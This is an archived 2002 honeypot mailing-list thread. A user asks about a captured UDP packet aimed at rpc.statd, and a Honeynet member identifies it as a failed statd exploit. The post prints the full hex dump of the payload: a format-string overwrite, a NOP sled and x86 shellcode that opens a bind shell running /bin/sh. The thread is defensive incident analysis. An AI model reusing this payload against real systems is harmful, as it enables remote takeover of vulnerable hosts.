Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

honeypots logo Honeypots mailing list archives

Re: statd exploit ???
From: mike () honeynet org
Date: Wed, 30 Oct 2002 19:21:05 -0500 (EST)
Looks like a rpc.statd exploit, check securityfocus.com vuln db for it :)
Looks like it failed too.

Good luck

Mike
Honeynet Project Member

On Wed, 30 Oct 2002, Sriram Newsgroups wrote:



My honeypt recorded this  packet. It looks to be a statd exploit (port
32768). I can't narrow it down to what exactly this exploit does or its nature.

Here is the sample packet

10/25-17:41:34.464523 24.123.46.10:847 -> x.x.x.linux:32768
UDP TTL:47 TOS:0x0 ID:51930 IpLen:20 DgmLen:1104
Len: 1084
51 1B 5D 1C 00 00 00 00 00 00 00 02 00 01 86 B8  Q.].............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ...............
3D B9 D6 3B 00 00 00 09 6C 6F 63 61 6C 68 6F 73  =..;....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF  ................
18 F7 FF BF 1A F7 FF BF 1A F7 FF BF 25 38 78 25  ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 36 32 37 31 36 78 25 68  x%8x%8x%62716x%h
6E 25 35 31 38 35 39 78 25 68 6E 90 90 90 90 90  n%51859x%hn.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
-------------------------- Reapeted 41 lines ---------------------
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0  ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3  .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E  .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66  ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0  .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0  f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7  ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56  F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F  ..N.............
FF FF FF 00                                      ....


My honeypot replied with this

10/25-17:41:34.468306 x.x.x.linux:32768 -> 24.123.46.10:847
UDP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
Len: 40
51 1B 5D 1C 00 00 00 01 00 00 00 00 00 00 00 00  Q.].............
00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2F  .............../


Any ideas ????

Sriram

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]